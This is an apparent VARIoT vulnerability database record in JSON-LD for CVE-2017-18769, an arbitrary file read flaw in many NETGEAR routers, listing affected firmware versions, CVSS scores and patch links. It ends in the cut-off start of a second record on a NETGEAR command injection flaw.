Certain NETGEAR devices are affected by an attacker's ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44. plural NETGEAR The device is vulnerable to information leakage.Information may be obtained. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR R7500 is a wireless router. NETGEAR D6220 is a wireless modem
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1335",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jr6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.36"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.112"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.40"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10j"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.4"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "r6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.4"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.44"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.20"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.74"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "d7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200bv4",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "jr6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.36"
},
{
"model": "r7500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.3.20"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "wndr4500v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wndr4300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r6700v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.4"
},
{
"model": "r6900v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.4"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "dgn2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "ex6200v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "r6050 \u003c1.0.1.10j",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "wndr3700v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr4300v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.44"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200bv4_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:jr6150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7800_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
}
]
},
"cve": "CVE-2017-18769",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2017-18769",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014876",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2020-31317",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2017-18769",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "PHYSICAL",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2017-18769",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Physical",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.6,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014876",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18769",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18769",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2017-014876",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-31317",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1874",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX6200v2 before 1.0.1.50, EX7000 before 1.0.0.56, JR6150 before 1.0.1.18, R6050 before 1.0.1.10J, R6100 before 1.0.1.16, R6150 before 1.0.1.10, R6220 before 1.1.0.50, R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.26, R6700v2 before 1.2.0.4, R6800 before 1.0.1.10, R6900 before 1.0.1.26, R6900P before 1.0.0.58, R6900v2 before 1.2.0.4, R7000 before 1.0.9.6, R7000P before 1.0.0.58, R7100LG before 1.0.0.32, R7300 before 1.0.0.54, R7500 before 1.0.0.112, R7500v2 before 1.0.3.20, R7800 before 1.0.2.36, R7900 before 1.0.1.18, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.2.40, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, and WNR3500Lv2 before 1.2.0.44. plural NETGEAR The device is vulnerable to information leakage.Information may be obtained. NETGEAR WNR3500L, etc. are all products of NETGEAR. WNR3500L is a wireless router. NETGEAR R7500 is a wireless router. NETGEAR D6220 is a wireless modem",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18769"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNVD",
"id": "CNVD-2020-31317"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18769",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-31317",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"id": "VAR-202004-1335",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
}
],
"trust": 1.168299118409091
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
}
]
},
"last_update_date": "2024-11-23T21:51:30.977000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Arbitrary File Read on Some Routers, Gateways, and Extenders, PSV-2016-0122",
"trust": 0.8,
"url": "https://kb.netgear.com/000051474/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0122"
},
{
"title": "Patch for Multiple NETGEAR product information disclosure vulnerabilities (CNVD-2020-31317)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/220091"
},
{
"title": "Multiple NETGEAR Product information disclosure vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117001"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18769"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051474/security-advisory-for-arbitrary-file-read-on-some-routers-gateways-and-extenders-psv-2016-0122"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18769"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"date": "2020-04-22T15:15:11.457000",
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31317"
},
{
"date": "2020-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014876"
},
{
"date": "2020-04-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1874"
},
{
"date": "2024-11-21T03:20:52.507000",
"db": "NVD",
"id": "CVE-2017-18769"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014876"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1874"
}
],
"trust": 0.6
}
}
var-202112-2398
Vulnerability from variot
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.78, D6100 before 1.0.0.63, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DGN2200Bv4 before 1.0.0.109, DGN2200v4 before 1.0.0.110, R6250 before 1.0.4.34, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300 before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.56. plural NETGEAR A command injection vulnerability exists in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This affects D3600 prior to 1.0.0.76, D6000 prior to 1.0.0.78, D6100 prior to 1.0.0.63, D6220 prior to 1.0.0.52, D6400 prior to 1.0.0.86, D7800 prior to 1.0.1.56, D8500 prior to 1.0.3.44, DGN2200Bv4 prior to 1.0.0.109, DGN2200v4 prior to 1.0.0.110, R6250 prior to 1.0.4.34, R6300v2 prior to 1.0.4.34, R6400 prior to 1.0.1.46, R6400v2 prior to 1.0.2.66, R6700 prior to 1.0.2.6, R6700v3 prior to 1.0.2.66, R6900 prior to 1.0.2.4, R6900P prior to 1.3.1.64, R7000 prior to 1.0.9.42, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.50, R7300 prior to 1.0.0.70, R7900 prior to 1.0.3.8, R7900P prior to 1.4.1.30, R8000 prior to 1.0.4.28, R8000P prior to 1.4.1.30, R8300 prior to 1.0.2.128, R8500 prior to 1.0.2.128, WNDR3400v3 prior to 1.0.1.24, WNR3500Lv2 prior to 1.2.0.62, and XR500 prior to 2.3.2.56
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202112-2398",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.66"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.0,
